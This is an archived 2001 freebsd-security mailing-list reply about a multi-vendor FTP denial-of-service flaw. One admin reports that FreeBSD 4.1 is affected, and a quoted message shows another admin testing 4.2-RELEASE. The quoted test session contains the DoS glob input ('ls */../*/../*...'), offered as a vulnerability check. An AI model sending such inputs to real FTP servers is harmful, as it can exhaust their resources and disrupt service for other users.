From owner-freebsd-security  Thu Mar 15 15:14:59 2001
Delivered-To: freebsd-security@freebsd.org
Received: from cage.simianscience.com (cage.simianscience.com [64.7.134.1])
	by hub.freebsd.org (Postfix) with ESMTP id EFD5B37B719
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 15:14:55 -0800 (PST)
	(envelope-from mike@sentex.net)
Received: from chimp (fcage [192.168.0.2])
	by cage.simianscience.com (8.11.2/8.11.2) with ESMTP id f2FNEsg62264
	for <freebsd-security@FreeBSD.ORG>; Thu, 15 Mar 2001 18:14:54 -0500 (EST)
	(envelope-from mike@sentex.net)
Message-Id: <4.2.2.20010315181354.02a035d0@marble.sentex.net>
X-Sender: mdtancsa@marble.sentex.net
X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.2 
Date: Thu, 15 Mar 2001 18:14:53 -0500
To: freebsd-security@FreeBSD.ORG
From: Mike Tancsa <mike@sentex.net>
Subject: Re: Multiple vendors FTP denial of service (fwd)
In-Reply-To: <200103152250.TAA16613@ns1.via-net-works.net.ar>
References: <Pine.BSO.4.33.0103152116530.26292-100000@k2.jozsef.kando.hu>
Mime-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"; format=flowed
Content-Transfer-Encoding: quoted-printable
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org


4.1 from Aug 10th is hurt by it.

         ---Mike

At 07:50 PM 3/15/2001 -0300, Fernando Schapachnik wrote:
>En un mensaje anterior, Attila Nagy escribi=F3:
> >
> > FreeBSD isn't listed, but also vulnerable, at least with the FTPd in
> > -STABLE.
>
>Sure?
>
>With 4.2-REL:
>
>Remote system type is UNIX.
>Using binary mode to transfer files.
>ftp> ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
>150 Opening ASCII mode data connection for '/bin/ls'.
>226 Transfer complete.
>ftp>
>ftp> ls
>150 Opening ASCII mode data connection for '/bin/ls'.
>total 13
>-rw-r--r--  1 fpscha  wheel   628 27 dic 10:38 .cshrc
>drwx------  2 fpscha  wheel   512 29 dic 13:17 .elm
>-rw-------  1 fpscha  wheel  1517 20 feb 09:28 .history
>-rw-r--r--  1 fpscha  wheel   299 27 dic 10:38 .login
>
>[Everything normal, I mean]
>
>
>Regards.
>
>Fernando P. Schapachnik
>Administraci=F3n de la red
>VIA NET.WORKS ARGENTINA S.A.
>fschapachnik@vianetworks.com.ar
>Conmutador: (54-11) 4323-3333 - Soporte: 0810-333-AYUDA
>
>To Unsubscribe: send mail to majordomo@FreeBSD.org
>with "unsubscribe freebsd-security" in the body of the message

--------------------------------------------------------------------
Mike Tancsa,                          	          tel +1 519 651 3400
Network Administration,     			  mike@sentex.net
Sentex Communications                 		  www.sentex.net
Cambridge, Ontario Canada			  www.sentex.net/mike


To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message